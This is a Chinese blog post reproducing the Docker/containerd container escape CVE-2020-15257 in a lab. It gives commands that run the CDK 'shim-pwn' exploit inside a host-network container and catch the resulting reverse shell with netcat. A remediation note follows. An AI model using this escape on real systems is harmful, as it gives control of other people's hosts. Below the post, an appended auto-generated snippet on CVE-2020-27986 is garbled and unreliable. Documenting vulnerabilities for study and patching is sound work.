docker的逃逸复现(CVE-2020-15257-host模式容器逃逸漏洞)

  1. host模式下的docker逃逸的概述

因为docker所使用的是隔离技术,就导致了容器内的进程无法看到外面的进程,但外面的进程可以看到里面,所以如果一个 Docker 容器内部可以操作该容器的外部资源,一般理解为操作宿主机的行为。叫做docker逃逸。

host模式

这种模式下,容器和主机已经没有网络隔离了,它们共享同一个网络命名空间,容器的网络配置和主机完全一样,使用主机的IP地址和端口,可以查看到主机所有网卡信息、网络资源,在网络性能上没有损耗。

但也正是因为没有网络隔离,容器和主机容易产生网络资源冲突、争抢,以及其他的一些问题。本文所述漏洞也是在这种模式下产生的

  1. 漏洞原理

由上图可知containerd 是由 Docker Daemon 中的容器运行时及其管理功能剥离了出来。docker 对容器的管理和操作基本都是通过 containerd 完成的。它向上为 Docker Daemon 提供了 gRPC 接口,向下通过 containerd-shim 结合 runc,实现对容器的管理控制。

docker容器以--net=host启动会暴露containerd-shim监听的unix域套接字,unix套接字中有十分多的containerd-shim API,攻击者可以通过操作这些API实现docker逃逸。利用containerd-shim Create API, 相当于执行runc create , 读取config.json 的配置,创建一个新容器。

config.json:包含容器运行的配置数据。

  1. 漏洞的复现

3.1漏洞环境

系统环境:ubuntu

docker版本:18.09

containerd 版本:1.3.7

挂载的ununtu版本:18.04

3.2逃逸复现

containerd在创建containerd-shim之前,会创建一个Unix域套接字,设置的是抽象名字空间路径,抽象Unix域套接字没有权限限制,所以只能靠连接进程的UID、GID做访问控制,限定了只能是root(UID=0,GID=0)用户才能连接成功。

3.2.1安装ubuntu docker 镜像

命令:

docker pull ubuntu:18.04

3.2.2以host模式运行docker

命令:

docker run -ti --rm --network=host 9d581d2d315a   #--rm 退出后直接删除容器

结果:

查看运行的容器

命令:

docker ps -a

3.2.3下载github上的Exp:

下载地址:Release 0.1.6 · cdk-team/CDK · GitHub

解压后我们此实验只需使用cdk_linux_amd64文件,此文件可以将使用有漏洞的docker的主机的权限反射到攻击者的主机上。

3.2.4将cdk_linux_amd64文件拷贝到docker中的Ubuntu系统中

命令:

docker cp cdk_linux_amd64 9d581d2d315a:/

3.2.5执行cdk_linux_amd64文件

注意这里刚拷贝的文件无操作权限需要开放

开放操作权限命令:

chmod +x cdk_linux_amd64

结果:

执行文件:

./cdk_linux_amd64 run shim-pwn 192.168.239.133 1337  #这里反射到的地址为192.168.239.133的1337端口

结果:

3.2.6监听逃逸方端口

使用另一台主机监听逃逸方主机放射信息的端口

命令:

nc -lvvp 1337

结果:

这里可以看到已经成功监听到逃逸方反射的权限。

3.2.7漏洞检测

通过检查IP地址为逃逸方宿主机的IP地址表示逃逸方的主机权限已被成功拿下,docker逃逸成功。

  1. 漏洞修复

在最新发布的containerd1.3.9和1.4.3版本中,抽象Unix域套接字已经改成了普通文件路径的Unix域套接字从而修复了漏洞。

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
复现CVE-2020-27986漏洞,你可以按照以下步骤进行操作: 1. 首先,确保你已经安装好了Python,并且已经下载了相应的脚本。 2. 下载并运行SonarQube,你可以使用Docker运行SonarQube容器并设置端口。运行以下命令创建并启动SonarQube容器: ``` docker run -d -p 9000:9000 -p 9092:9092 sonarqube ``` 这将在你的本地主机上的9000端口上启动SonarQube服务。 3. 下载并运行CVE-2020-27986漏洞检测脚本。你可以从提供的CSDN链接中找到脚本并下载。确保将脚本保存在你的本地环境中。 4. 打开终端或命令行界面,并导航到保存了CVE-2020-27986漏洞检测脚本的目录。 5. 运行脚本,使用以下命令: ``` python 检测脚本.py ``` 替换"检测脚本.py"为你实际保存的脚本文件名。 6. 脚本将开始检测CVE-2020-27986漏洞。***0-27986漏洞。 请注意,复现漏洞是为了测试和研究目的,必须在合法和道德的框架内进行。在复现漏洞之前,请确保你已经获得了相应的授权,并且仅在合法的环境中进行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-27986(SonarQube敏感信息泄露)漏洞复现](https://blog.csdn.net/dreamthe/article/details/121617470)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码](https://download.csdn.net/download/weixin_42151305/15663762)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值